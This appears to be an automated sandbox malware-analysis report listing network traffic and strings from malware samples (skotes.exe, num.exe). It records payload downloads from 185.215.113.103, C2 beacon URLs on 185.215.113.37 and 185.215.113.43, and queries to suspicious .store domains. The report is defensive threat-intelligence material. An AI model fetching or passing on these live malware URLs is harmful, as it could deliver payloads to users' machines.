Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: 9d7da53f74.exe, 0000003C.00000003.2728337199.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/ equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2443a078f918f5d8bd5d4d5b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25489Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 07 Oct 2024 01:23:44 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=52d65d3cb3170de9b0432222; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 07 Oct 2024 01:23:22 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: chromecache_161.19.dr String found in binary or memory: _.iq(p)+"/familylink/privacy/notice/embedded?langCountry="+_.iq(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.iq(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.iq(_.rq(c))+"&hl="+_.iq(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.iq(m)+"/chromebook/termsofservice.html?languageCode="+_.iq(d)+"&regionCode="+_.iq(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded": equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ttps://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ 0 equals www.youtube.com (Youtube)
Source: 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exe
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/luma/random.exex6
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/test/num.exe
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exe
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exe/~
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/well/random.exe13
Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/9aqo
Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/=
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/LaJo
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.00000000005E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpGQ
Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJXi
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpKQ
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpoQ
Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
Source: num.exe, 00000014.00000002.2442698783.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzX
Source: num.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37E
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/15.113.43/ows
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid2=
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2953123746.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$AC
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0332001
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0349001
